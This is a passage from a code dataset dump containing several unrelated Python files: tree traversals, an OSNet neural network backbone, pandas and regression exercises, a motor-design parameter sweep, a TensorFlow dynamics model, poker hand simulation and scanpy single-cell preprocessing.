not None:\n queue.enqueue(current.left)\n # place current item's right node in queue if not None\n if current.right is not None:\n queue.enqueue(current.right)\n\n\n # Print the value of every node, starting with the given node,\n # in an iterative depth first traversal\n def dft_print(self, node=None):\n # initialize an empty stack\n empty_stack = Stack()\n # push the root node onto the stack\n empty_stack.push(self)\n # need a while loop to manager our iteration\n while len(empty_stack) > 0:\n\n # if stack is not empty enter the while loop\n\n # pop top item off 
the stack\n item = empty_stack.pop()\n # print that item's value\n print(item.value)\n\n\n # if there is a right subtree\n if item.right is not None:\n empty_stack.push(item.right)\n # push right item onto the stack\n if item.left is not None:\n empty_stack.push(item.left)\n # if there is a left subtree\n # push left item onto the stack\n\n\n\n # Stretch Goals -------------------------\n # Note: Research may be required\n\n # Print Pre-order recursive DFT\n def pre_order_dft(self, node):\n if node:\n print(node.value)\n\n self.pre_order_dft(node.left)\n self.pre_order_dft(node.right)\n\n\n # Print Post-order recursive DFT\n def post_order_dft(self, node):\n if node:\n self.post_order_dft(node.left)\n self.post_order_dft(node.right)\n\n\n print(node.value)\n\n\n\n\nbnt = BSTNode(20)\nbnt.insert(3)\nbnt.insert(3232)\nbnt.insert(4232)\nprint(bnt.get_max())\narr = []\ncb = lambda x: arr.append(x * 5)\nbnt.for_each(cb)\nprint(arr)\n\nbst = BSTNode(1)\nbst.insert(8)\nbst.insert(5)\nbst.insert(7)\nbst.insert(6)\nbst.insert(3)\nbst.insert(4)\nbst.insert(2)\nbst.post_order_dft(bst)\n\n","sub_path":"binary_search_tree/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":5949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"112506302","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom src.model.module import (\n ConvModule, \n Res2NetStem, \n InversedDepthwiseSeparable, \n SEModule, \n DropChannel\n)\n\n##########\n# Basic layers\n##########\nclass OSBlock(nn.Module):\n \"\"\"\n Omni-scale feature learning block.\n x\n |\n Conv 1x1\n |\n | | | |\n InversedDepthwiseSeparable InversedDepthwiseSeparable InversedDepthwiseSeparable InversedDepthwiseSeparable\n InversedDepthwiseSeparable InversedDepthwiseSeparable InversedDepthwiseSeparable |\n InversedDepthwiseSeparable InversedDepthwiseSeparable | |\n InversedDepthwiseSeparable | | |\n | | | |\n \"\"\"\n \n def __init__(self, in_channels, out_channels, bottleneck_reduction=4):\n super(OSBlock, self).__init__()\n mid_channels = out_channels // bottleneck_reduction\n self.conv1 = ConvModule(\n in_channels,\n mid_channels,\n 1\n )\n self.conv2a = InversedDepthwiseSeparable(\n mid_channels, \n mid_channels,\n 3\n ) \n self.conv2b = nn.Sequential(\n InversedDepthwiseSeparable(\n mid_channels, \n mid_channels,\n 3\n ),\n DropChannel(),\n InversedDepthwiseSeparable(\n mid_channels, \n mid_channels,\n 3\n )\n )\n self.conv2c = nn.Sequential(\n InversedDepthwiseSeparable(\n mid_channels, \n mid_channels,\n 3\n ),\n DropChannel(),\n InversedDepthwiseSeparable(\n mid_channels, \n mid_channels,\n 3\n ),\n DropChannel(),\n InversedDepthwiseSeparable(\n mid_channels, \n mid_channels,\n 3\n )\n )\n self.conv2d = nn.Sequential(\n InversedDepthwiseSeparable(\n mid_channels, \n mid_channels,\n 3\n ),\n DropChannel(),\n InversedDepthwiseSeparable(\n mid_channels, \n mid_channels,\n 3\n ),\n DropChannel(),\n InversedDepthwiseSeparable(\n mid_channels, \n mid_channels,\n 3\n ),\n DropChannel(),\n InversedDepthwiseSeparable(\n mid_channels, \n mid_channels,\n 3\n )\n )\n self.gate = SEModule(mid_channels)\n self.conv3 = ConvModule(\n mid_channels,\n out_channels,\n 1,\n activation=\"linear\")\n self.downsample = None\n if in_channels != out_channels:\n self.downsample = ConvModule(\n in_channels, \n out_channels,\n 1,\n activation=\"linear\")\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n residual = x\n x1 = self.conv1(x)\n x2a = 
self.conv2a(x1)\n x2b = self.conv2b(x1)\n x2c = self.conv2c(x1)\n x2d = self.conv2d(x1)\n x2 = self.gate(x2a) + self.gate(x2b) + self.gate(x2c) + self.gate(x2d)\n x3 = self.conv3(x2)\n if self.downsample is not None:\n residual = self.downsample(residual)\n out = self.relu(x3 + residual)\n return out\n\n\n##########\n# Network architecture\n##########\nclass OSNet(nn.Module):\n \"\"\"Omni-Scale Network.\n \n Reference:\n - Zhou et al. Omni-Scale Feature Learning for Person Re-Identification. ArXiv preprint, 2019.\n https://arxiv.org/abs/1905.00953\n \"\"\"\n\n def __init__(self, first_channel, stage_repeat, arch):\n super(OSNet, self).__init__()\n self.stem = Res2NetStem(3, first_channel) # output stride 4\n self.stages = nn.ModuleList()\n a_idx = 0\n for s_idx in range(len(stage_repeat)):\n stage = []\n for _ in range(stage_repeat[s_idx]):\n block, inc, ouc, s = arch[a_idx]\n a_idx += 1\n stage.append(self._make_layer(block, inc, ouc, s))\n print(stage) \n self.stages.append(nn.Sequential(*stage))\n self.last_channel = ouc\n self._init_params()\n\n def _make_layer(self, block, inc, ouc, s):\n if block == 'OSBlock':\n if s == 1:\n print(s)\n return OSBlock(inc, ouc)\n else:\n return nn.Sequential(\n ConvModule(inc, ouc, 1),\n nn.AvgPool2d(2, stride=2)\n )\n if block == 'ConvModule':\n return ConvModule(inc, ouc, 1)\n \n def _init_params(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n \n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n \n elif isinstance(m, nn.BatchNorm1d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n \n elif isinstance(m, nn.Linear):\n nn.init.normal_(m.weight, 0, 0.01)\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n\n def forward(self, x):\n x = self.stem(x)\n stage_feats = []\n for stage in self.stages:\n x = stage(x)\n stage_feats.append(x)\n return stage_feats\n \n##########\n# Instantiation\n##########\ndef osnet():\n return OSNet(\n first_channel=64,\n stage_repeat=[3, 3, 4],\n arch=[\n ('OSBlock', 64, 256, 1),\n ('OSBlock', 256, 256, 1),\n ('OSBlock', 256, 256, 2),\n ('OSBlock', 256, 384, 1),\n ('OSBlock', 384, 384, 1),\n ('OSBlock', 384, 384, 2),\n ('OSBlock', 384, 512, 1),\n ('OSBlock', 512, 512, 1),\n ('OSBlock', 512, 512, 1),\n ('ConvModule', 512, 512, 1)\n ]\n )\n","sub_path":"src/model/backbone/osnet.py","file_name":"osnet.py","file_ext":"py","file_size_in_byte":6765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"111779966","text":"# %%\nimport numpy as np\nimport pandas as pd\n\n # %%\ndata_frame = pd.DataFrame([[1, np.nan, 2],\n [2, 3, 5],\n [np.nan, 4, 6]])\n\n# %%\n#1) Use the function fill.na to fill the na values with 999\n\ne = data_frame.fillna(999)\n\n# %%\n\n#2) Turn the 999 values back to nas. 
See how many different ways you can do this\nd=np.where(e==999, np.nan, e)\nd\n\n# %%\n# put it in brackets and it will understand that this is what we're looking for\n#implicit masking\ndata_frame[data_frame == 999] = np.nan\ndata_frame\n# %%\ndata_frame9 = data_frame.fillna(999)\ndata_frame9[data_frame.isnull()] = np.nan\n# %%\ndata_frame9 = data_frame.fillna(999)\ndata_frame9 = data_frame9 +data_frame\ndata_frame9\n# %%\ndata_frame9 = data_frame.fillna(999) \ndata_frame9.replace(999, np.nan)\n# %%\n#%%\nimport os\nimport matplotlib.pyplot as plt\nplt.style.use('classic')\nimport numpy as np\n# %%\nx = np.linspace (0,10,100)\ny=np.sin(x)\n# %%\nplt.plot(x,y)\n# %%\n","sub_path":"Training_Workspace/Class101.py","file_name":"Class101.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"512830348","text":"#design space definition\n## alpha export\nx0=1.0\ndx=0.2\nN=6\nalpha=[None]*N\nalpha[0]=x0\nfor i in range(N-1):\n\talpha[i+1]=round(alpha[i]+dx,2)\n\n## beta export\nx0=0.1\ndx=0.1\nN=3\nbeta=[None]*N\nbeta[0]=x0\nfor i in range(N-1):\n\tbeta[i+1]=round(beta[i]+dx,2)\n\n## dgap\nx0=3.0\t#init\ndx=1\t#diff\nN=4\t\t#length\nd_gap=[None]*N \t#initialize size\nd_gap[0]=x0\t\t#first value\nfor i in range(N-1):\t\n\td_gap[i+1]=round(d_gap[i]+dx,2)\t\n\t\n## rmot\nr_mot=[10,15,20]\n# r_mot=[20]\n\n#info about the motor and its revision and blahblah\nrev='1'\nmot='slotted'\ndir='mot_'+mot+'/' ##create this folder manually\t\n\t\t\nj=8\t\n## 6 JT\nfor l in range(0,len(r_mot)):\n\t##size of the airgap... we have to transform it afterwards\n\tif r_mot[l]==10:\n\t\td_st=8\n\t\tw_slot=7\n\t\tl_0=7\n\telif r_mot[l]==15:\n\t\td_st=13\n\t\tw_slot=12\n\t\tl_0=9\n\telif r_mot[l]==20:\n\t\td_st=18\n\t\tw_slot=16\n\t\tl_0=11\n\n\tdx=1\t#diff\n\tN=4\t\t#length\n\tl_slot=[None]*N \t#initialize size\n\tl_slot[0]=l_0\t\t#first value\n\tfor z in range(N-1):\n\t\tl_slot[z+1]=round(l_slot[z]+dx,1)\t\t\n\n\tselectCurrentStep(activeScenario=Scenario['2_DALPHA_R'+str(r_mot[l])],\n\t\t\t\tparameterValue=['ALPHA_H='+str(alpha[0]),\n\t\t\t\t\t\t\t\t'BETA='+str(beta[0]),\n\t\t\t\t\t\t\t\t'DALPHA_MULT=1',\n\t\t\t\t\t\t\t\t# 'DTHETA=90',\n\t\t\t\t\t\t\t\t'L_SLOT='+str(l_0),\n\t\t\t\t\t\t\t\t'R_ROT_OUT='+str(r_mot[0]),\n\t\t\t\t\t\t\t\t'D_ST='+str(d_st),\n\t\t\t\t\t\t\t\t'W_SLOT='+str(w_slot)])\n\t\t\t\t\t\t\t\t# 'JF_RMS='+str(cat[m])])\t\n\t\t\t\t\t\t\t\t# 'JT_RMS='+str(j)])\t\n\t\t\t\t\t\t\t \n\tCSVExportTable(parameter=[VariationParameter['R_ROT_OUT'],\n\t\t\t\t\t\t\t VariationParameter['TX_ROT'],\n\t\t\t\t\t\t\t VariationParameter['TX_ST'],\n\t\t\t\t\t\t\t VariationParameter['TY_ROT'],\n\t\t\t\t\t\t\t VariationParameter['TY_ST'],\n\t\t\t\t\t\t\t VariationParameter['TZ_ROT'],\n\t\t\t\t\t\t\t VariationParameter['TZ_ST']],\n\t\t\t\t\tevolutivePath=EvolutivePath(parameterSet=[SetParameterXVariable(paramEvol=VariationParameter['ALPHA_H'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t limitMin=alpha[0],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t limitMax=alpha[-1]),\n\t\t\t\t\tSetParameterXVariable(paramEvol=VariationParameter['BETA'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t limitMin=beta[0],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t limitMax=beta[-1]),\n\t\t\t\t\tSetParameterXVariable(paramEvol=VariationParameter['L_SLOT'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t limitMin=l_slot[0],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 
limitMax=l_slot[-1]),\n\t\t\t\t\tSetParameterFixed(paramEvol=VariationParameter['R_ROT_OUT'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t currentValue=r_mot[l]),\t\n\t\t\t\t\tSetParameterFixed(paramEvol=VariationParameter['DALPHA_MULT'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t currentValue=1),\n\t\t\t\t\t# SetParameterFixed(paramEvol=VariationParameter['DTHETA'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t # currentValue=90),\n\t\t\t\t\tSetParameterFixed(paramEvol=VariationParameter['W_SLOT'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t currentValue=w_slot),\n\t\t\t\t\tSetParameterFixed(paramEvol=VariationParameter['D_ST'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t currentValue=d_st)]),\n\t\t\t\t\tfilename=dir+mot+'_2_DALPHA_rev'+rev+'_R_'+str(r_mot[l]))\t\t ","sub_path":"0_flux_to_xls/6_journal_out/slotted_separated_scenarios/20190531_2_dalpha_slotted.py","file_name":"20190531_2_dalpha_slotted.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"340318295","text":"import tensorflow as tf\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n# from policy_value_network.liner_sample import Sample\n# from env.plane.liner_env import Planes_Env\nsave_model_dir = \"./current_best_dynamic_fit_plane_model\"\n'''Sampling with a method that is not very random will certainly give poor results'''\n'''If it were completely non-random, no policy network would be needed -- it would just be a pure policy'''\nclass Dynamic_Net():\n    def __init__(self,env, lr=0.0001, model_file=None):\n        self.n_features = env.observation_dim # input feature dimension\n        self.learning_rate = lr # learning rate\n        self.loss_alpha = 0.95 # weight of the past loss in the moving average\n        self.batch = 100 # batch size\n        self.iter = 2000 # total number of iterations\n        self.n_actions = env.action_dim # action space dimension; the actions here are continuous\n        # 1.1 Build the input layer (placeholders are needed because the graph is static)\n        self.obs_action = tf.placeholder(tf.float32, shape=[None, self.n_features+self.n_actions])\n        # 1.2 First hidden layer: 200 neurons, relu activation\n        self.f1 = tf.layers.dense(inputs=self.obs_action, units=200, activation=tf.nn.relu,\n                                  kernel_initializer=tf.random_normal_initializer(mean=0, stddev=0.1), \\\n                                  bias_initializer=tf.constant_initializer(0.1))\n        # 1.3 Second hidden layer: 100 neurons, relu activation\n        self.f2 = tf.layers.dense(inputs=self.f1, units=100, activation=tf.nn.relu,\n                                  kernel_initializer=tf.random_normal_initializer(mean=0, stddev=0.1),\\\n                                  bias_initializer=tf.constant_initializer(0.1))\n        # 1.4 Output layer: n_features neurons, no activation function\n        self.predict = tf.layers.dense(inputs=self.f2, units= self.n_features)\n        # 2. Build the loss function\n        self.delta = tf.placeholder(tf.float32,[None, self.n_features]) # tf only defines the computation flow, i.e. a recipe for the calculation\n        self.loss = tf.reduce_mean(tf.square(self.predict-self.delta))\n        # 3. Define an optimizer\n        self.train_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss)\n        # 4. tf session\n        self.sess = tf.Session() # the session can be created once the graph is built\n        # 5. Initialize the variables in the graph (similar to instantiation in C++)\n        self.sess.run(tf.global_variables_initializer())\n        # 6. Define model saving and restoring\n        self.saver = tf.train.Saver()\n        # iterative training\n        if model_file is not None:\n            self.restore_model(model_file)\n    # Fit the dynamics equation: sample correct labels to fit the dynamics model\n    def fit_dynamic(self,batch_obs_act,batch_delta,save_dir = None,epoch =10):\n        flag = 0\n        train_obs_act = batch_obs_act\n        train_delta = batch_delta\n        N = train_delta.shape[0]\n        train_indicies = np.arange(N) # get the time-ordered indices\n        loss_line=[]\n        num = 0\n        ls = 0\n        # train the neural network\n        for i in range(self.iter):\n            np.random.shuffle(train_indicies)\n            for j in range(int(math.ceil(N/self.batch))):\n                start_idx = j * self.batch%N\n                idx = train_indicies[start_idx:start_idx+self.batch] # get the indices of one batch of data\n                # feed the data and train\n                self.sess.run([self.train_op], feed_dict={self.obs_action:train_obs_act[idx,:], self.delta:train_delta[idx,:]})\n                loss = self.sess.run([self.loss],feed_dict={self.obs_action:train_obs_act[idx,:], self.delta:train_delta[idx,:]})\n                loss_line.append(loss)\n                # print(loss[0]) # this is mainly to pull the value out of the list\n                if num == 0:\n                    ls=loss[0]\n                else:\n                    ls = self.loss_alpha*ls+(1-self.loss_alpha)*loss[0]\n                num+=1\n            if i > epoch:\n                flag=1\n                break\n            print(\"Run %d, error %f\" % (i, ls))\n            if flag == 1:\n                break\n        if save_dir is not None:\n            self.save_model(save_dir)\n        number_line=np.arange(len(loss_line)) # indices over the training iterations\n        plt.plot(number_line, loss_line)\n        plt.show()\n    def prediction(self,s_a, target_state = None,if_debug = False):\n        # normalize the data\n        norm_s_a = s_a\n        # use the neural network to predict\n        delta = self.sess.run(self.predict, feed_dict={self.obs_action:norm_s_a})\n        predict_out = delta + s_a[:,0:self.n_features]\n        '''Debug'''\n        if if_debug and target_state is not None:\n            x = np.arange(len(predict_out))\n            plt.figure(1)\n            plt.plot(x, predict_out[:,0],label=\"predict\")\n            plt.plot(x, target_state[:,0],'--',label=\"real\")\n            plt.legend(loc=\"best\")\n            # plt.savefig(\"./alpha.png\")\n            plt.figure(2)\n            plt.plot(x, predict_out[:, 1], label=\"predict\")\n            plt.plot(x, target_state[:, 1], '--', label=\"real\")\n            plt.legend(loc=\"best\")\n            # plt.savefig(\"./theta.png\")\n            plt.figure(3)\n            plt.plot(x, predict_out[:, 2], label=\"predict\")\n            plt.plot(x, target_state[:, 2], '--', label=\"real\")\n            plt.legend(loc=\"best\")\n            # plt.savefig(\"./q.png\")\n            plt.show()\n        return predict_out\n    # save-model helper\n    def save_model(self, model_path):\n        self.saver.save(self.sess, model_path)\n    # restore-model helper\n    def restore_model(self, model_path):\n        self.saver.restore(self.sess, model_path)\n# '''DEBUG'''\n# env = Planes_Env()\n# sampler = Sample(env)\n# dynamic_fit_network = Dynamic_Net(env,sampler)\n# sigma = [1,0.5,0.1]\n# mu = [1.5,2.5,0.5]\n#\n# '''Training set: multiple sampling runs are concatenated here'''\n# # train_x = None # i.e. the training set starts out empty\n# # train_y = None\n# # real_y = None\n# # if_experince_empty = True # whether the experience pool is empty\n# # for i in range(100):\n# #     K = np.random.normal(mu,sigma)\n# #     x,y,r_y = sampler.sample_episodes_with_PID(K,1)\n# #     # on the first sample, assign directly\n# #     if if_experince_empty:\n# #         train_x = x\n# #         train_y = y\n# #         real_y = r_y\n# #         if_experince_empty = False\n# #     else:\n# #         train_x = np.vstack((train_x,x))\n# #         train_y = np.vstack((train_y,y))\n# #         real_y = np.vstack((real_y,r_y))\n# # print(train_x.shape,train_y.shape,real_y.shape)\n# # dynamic_fit_network.fit_dynamic(train_x,train_y,save_model_dir)\n# '''Test set'''\n# K = np.random.normal(mu,sigma)\n# train_x , train_y , real_y = sampler.sample_episodes_with_PID(K,1)\n# dynamic_fit_network.prediction(train_x,real_y,True)\n\n\n","sub_path":"Eassy/NIPS/part1 dynamic_fit/dynamic_network/liner_plane_brain.py","file_name":"liner_plane_brain.py","file_ext":"py","file_size_in_byte":6786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"226279497","text":"import random\nfrom collections import Counter\n\nHeads = set([\"A\",\"K\",\"Q\",\"J\",\"T\",\"9\",\"8\",\"7\",\"6\",\"5\",\"4\",\"3\",\"2\"])\nColors = set([\"s\",\"c\",\"h\",\"d\"])\nCards = {a+b for a in Heads for b in Colors}\nk=100000\nk_vilain = 4\n\nc_hero = [\"As\",\"Kc\"]\n\n#These functions are used to assess the probability that a vilain draws one card\n#in a given range\ndef tirage(Cards,k_vilain,c_hero):\n    #the function removes the cards already known and draws cards for players if \n    #they are in a range\n    #Cards is the set of all possible cards\n    #k_vilain : number of other players\n    #c_hero : cards of the hero \n    Cards_copy = set(Cards)\n    vilain_cards=[]\n    for elmt in c_hero:\n        Cards_copy.remove(elmt)\n\n    for i in range(k_vilain):\n        c = random.sample(Cards_copy, 2)\n        vilain_cards.append(c)\n        for elmt in c: \n            Cards_copy.remove(elmt)\n    return vilain_cards\n\ndef is_in_range(card_r,vilain_cards):\n    #card_r : the range we give to vilain\n    #vilain_cards : list of the cards drawn by the vilain\n    S=0\n    combo = [a[0][0]+a[1][0] for a in vilain_cards]\n    for elmt in card_r:\n        if elmt in combo:\n            S=1\n    return S\n\ndef proba_card_vilain(Cards,k_vilain,card_r,c_hero,k):\n    #return the probability that a vilain has a given hand from a range\n    #we can assess for instance, in a 6-ring table, what is the probability\n    #that at least one vilain in the table has a pocket pair\n    \n    #Cards : pack of cards in a standard game\n    #k_vilain : number of other players in the table\n    #c_hero : cards dealt to hero\n    #k : number of iterations\n    #card_r : range of cards in format [\"AK\",\"QQ\",etc..]\n    P=0\n    for i in range(k):\n        a=tirage(Cards,k_vilain,c_hero)\n        P+=is_in_range(card_r,a)\n    return P/k\n\n#dictionary that associates a hand head with a value\nhand_strength = {\"2\":2,\"3\":3,\"4\":4,\"5\":5,\"6\":6,\"7\":7,\"8\":8,\"9\":9,\"T\":10,\"J\":11,\"Q\":12,\"K\":13,\"A\":14}\n#dictionary that stores the different combinations of a made hand \nsame_dict = {2:[],3:[],4:[],\"s\":[],\"f\":[],'sf':[]}\n\n\ndef draw_in_range(Cards,c_range):\n    #we draw two cards from a given range and remove them from the package\n    #Cards : remaining cards in our pack\n    #c_range : range of cards for the draw\n    \n    #We create a subsample \"l\" based on vilain range\n    l=sub_sample(Cards,c_range)\n    #We draw a random hand from the subsample\n    c_draw=random.sample(l, 1)\n    for c in c_draw[0]:\n        Cards.remove(c)\n    return tuple(c_draw)\n\ndef sub_sample(Cards,c_range):\n    #c_range : range of cards\n    #creation of the sample of all hands in a range stored in a list\n    c_range=range_arrange(c_range)\n    l1=[(u[0]+c,u[1]+c) for u in c_range for c in Colors if u[2]==\"s\" if u[0]+c in Cards if u[1]+c in Cards ]\n    l2=[(u[0]+c,u[1]+d) for u in c_range for c in Colors for d in Colors if c != d if u[2]==\"o\" if u[0]+c in Cards if u[1]+d in Cards ]\n    return l1+l2\n\ndef range_arrange(c_range):\n    #We add \"o\" to hands where it is not specified, to make the range easier to read by other\n    #functions\n    return [l+\"o\" if len(l)==2 else l for l in c_range]\n\ndef PF_draws(Cards,h_range,*vilain_range):\n    #We draw PF cards from the range given to hero and several vilains\n    #return a tuple with the hands of the vilains and the hand of the hero\n    h_hand=draw_in_range(Cards,h_range)\n    h_vilain = ()\n    for r in vilain_range:\n        h_vilain += 
draw_in_range(Cards,r)\n h_vilain += h_hand\n return h_vilain\n\ndef B_draw(Cards,i):\n #We draw a certain number of cards for the board\n c_draw=random.sample(Cards, i)\n for c in c_draw:\n Cards.remove(c)\n return c_draw\n\ndef sim(Cards,board,h_range,*v_range):\n #simulate a hand from distribution to river\n #board : tuple of cards already in the board\n #return a dictionnary with the hands from players and hands from board\n for c in board:\n Cards.remove(c)\n p_cards=PF_draws(Cards,h_range,*v_range)\n# print(p_cards)\n b_cards = board + B_draw(Cards,5-len(board))\n# print(tuple(b_cards))\n for c in board:\n if c in Cards:\n Cards.remove(c)\n h_dict = {\"board\": tuple(b_cards)}\n i=1\n for p in p_cards:\n h_dict[f\"player {i}\"]=p\n i+=1\n return h_dict\n\ndef h_made(h_dict):\n h_dict_copy = dict(h_dict)\n board = h_dict_copy.pop(\"board\",0)\n player_hand = {key: h_val(item+board) for key,item in h_dict_copy.items()}\n return player_hand\n\ndef h_val(hand):\n same_dict = {\"c\":[],2:[],3:[],4:[],\"s\":[],\"f\":[],\"sf\":[]}\n f=flush(hand)\n sf=straight_flush(hand)\n if f:\n same_dict['f']=f\n if sf:\n same_dict[\"sf\"]=sf\n h=tuple([hand_strength[h[0]] for h in hand])\n c=sorted(list(h),reverse=True)\n same_dict[\"c\"]=c\n if 13 in h:\n h=h+(1,)\n s=straight(h)\n if s:\n same_dict['s']=s[-1]\n t=Counter(h).items()\n for elmt in t:\n if elmt[1]==2 or elmt[1]==3 or elmt[1]==4:\n same_dict[elmt[1]].append(elmt[0])\n return same_dict\n\ndef straight(hand):\n c=set(sorted(hand))\n return [c.intersection(set(range(1+i,6+i))) for i in range(10) if len(c.intersection(set(range(1+i,6+i))))==5]\n\ndef flush(hand):\n s=[h for h in hand if 's' in h]\n d=[h for h in hand if 'd' in h]\n c=[h for h in hand if 'c' in h]\n h=[h for h in hand if 'h' in h]\n L=[s,d,c,h]\n for elmt in L:\n if len(elmt)>=5:\n return tuple(elmt)\n \ndef straight_flush(hand):\n h=flush(hand)\n if h:\n h=tuple([hand_strength[h[0]] for h in h])\n if 13 in h:\n h=h+(1,)\n return straight(h)","sub_path":"Poker project/poker_func.py","file_name":"poker_func.py","file_ext":"py","file_size_in_byte":5533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"404510335","text":"import numpy as nu\nimport math as mt\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nx=nu.linspace(0,1,100)\nn=nu.random.normal(0,0.3,100)\ns=b=z=y=nu.zeros(100)\nfor i in range(100):\n\tz[i]=2*mt.pi*x[i]\nfor i in range(100):\n\ty[i]=n[i]+mt.sin(z[i])\na=y\nx_train, x_test, y_train, y_test=train_test_split(x, y, test_size=0.20, train_size=0.80)\nplt.plot(x_train, y_train, 'o')\nalpha=0.05\nc = nu.array([[0,0]]).T # Initial values of c\nX = nu.c_[nu.ones(80),x_train]\nY = nu.c_[y_train]\nW=[]\nfor i in range(9):\n X_i=nu.c_[x_train].T\nfor i in range(9):\n b[i]=nu.sum(c[1] - alpha * (1/len(Y)) * nu.sum(nu.dot(X_i,(nu.dot(X,c)-Y))))\n c= nu.array([[0],[b[i]]])\n W.append(b[i])\n s[i]=s[i]+b[i]\nfor i in range(9):\n plt.plot(x, a)\n a=a+pow(x,i)*s[i]\nplt.suptitle('Linear regression by gradient descent')\nplt.xlabel('x')\nplt.ylabel('y')\nplt.show()\nprint(\"Estimated Value of W:\\n\",W)\nt=nu.dot((nu.dot(X,c) - y_test).T,(nu.dot(X,c) - y_test))/(2*len(Y))\nprint(\"test_error_on_test_data =\\n\",t)","sub_path":"Assignment 1/Q_3/Question_3 _100.py","file_name":"Question_3 _100.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"78240540","text":"import os.path as op\nimport 
numpy as np\nimport matplotlib.pyplot as plt\nimport scvelo as scv\nimport scanpy as sc\n\ndef import_scv_loom(loom):\n print('Importing loom file...')\n adata = sc.read_loom(loom, sparse=True, X_name='spliced')\n print(\"Column attributes:\", adata.obs_keys())\n print(\"Row attributes:\", adata.var_keys())\n print('Shape: ', adata.shape)\n return adata\n\ndef preprocess(adata, min_counts = 1, min_genes = 1, plot = False, n_top_genes = None, keep_genes = None):\n adata.obs_names_make_unique()\n adata.var_names_make_unique()\n if keep_genes == None: sc.pp.filter_genes(adata, min_counts=min_counts)\n else:\n gene_subset, number_per_gene = sc.pp.filter_genes(adata, min_counts=min_counts,\n inplace = False)\n print(adata.var_names[gene_subset])\n gene_subset = np.array(list(set(adata.var_names[gene_subset]) or (set(keep_genes))))\n print(gene_subset)\n keep = []\n for i in list(adata.var_names.values):\n if i in gene_subset:\n keep.append(True)\n else: keep.append(False)\n adata = adata[:,keep]\n\n sc.pp.filter_cells(adata, min_genes=min_genes, inplace = True)\n if n_top_genes is not None: scv.pp.filter_genes_dispersion(adata, n_top_genes = n_top_genes)\n print(\"Filtered data shape:\", adata.shape)\n adata.obs['n_counts'] = np.sum(adata.X, axis=1)\n mito_genes = adata.var_names.str.startswith('MT-')\n adata.obs['percent_mito'] = np.sum(\n adata[:, mito_genes].X, axis=1) / np.sum(adata.X, axis=1)\n sc.pp.calculate_qc_metrics(adata)\n if plot == True:\n sc.pl.violin(adata, [ 'n_genes','n_counts', 'percent_mito'], jitter=0.4, multi_panel=True)\n plt.show()\n # adata.raw = adata\n return adata\n\ndef normalize(adata, log = True, plot_hvg = False, min_mean = 0.0125, max_mean = 5, min_disp = 0.8):\n print(\"Normalizing...\")\n sc.pp.normalize_per_cell(adata, copy=False)\n if log == True:\n sc.pp.log1p(adata)\n print(\"Finding highly variable genes (HVGs)... 
\")\n sc.pp.highly_variable_genes(adata, min_mean=min_mean, max_mean=max_mean, min_disp=min_disp, flavor='cell_ranger')\n if plot_hvg == True:\n sc.pl.highly_variable_genes(adata)\n plt.show()\n return adata\n\ndef correct_cell_cycle(adata, return_cc_genes = False):\n print(\"Correcting for cell cycle...\")\n try:\n cell_cycle_genes = [x.strip() for x in open('/Users/sarahmaddox/Quaranta_Lab/SCLC/Gene_types/cell_cycle_genes.txt')]\n except FileNotFoundError: print(\"Please change directory for cell cycle genes list.\")\n s_genes = cell_cycle_genes[:43]\n g2m_genes = cell_cycle_genes[43:]\n cell_cycle_genes = [x for x in cell_cycle_genes if x in adata.var_names]\n\n sc.tl.score_genes_cell_cycle(adata, s_genes=s_genes, g2m_genes=g2m_genes)\n\n adata_cc_genes = adata[:, cell_cycle_genes]\n adata_cc_genes = sc.pp.pca(adata_cc_genes, n_comps=10, copy=True)\n adata_cc_genes = sc.tl.pca(adata_cc_genes, n_comps=10, copy=True)\n sc.pl.pca_scatter(adata_cc_genes, color='phase')\n\n sc.pp.regress_out(adata, ['S_score', 'G2M_score'])\n # sc.pp.scale(adata) #Don't scale if using this data for cell state space\n\n adata_cc_genes = adata[:, cell_cycle_genes]\n adata_cc_genes = sc.pp.pca(adata_cc_genes, n_comps=10, copy=True)\n adata_cc_genes = sc.tl.pca(adata_cc_genes, n_comps=10, copy=True)\n sc.pl.pca_scatter(adata_cc_genes, color='phase')\n if return_cc_genes == True:\n return adata, adata_cc_genes\n\n else:\n return adata\n\ndef 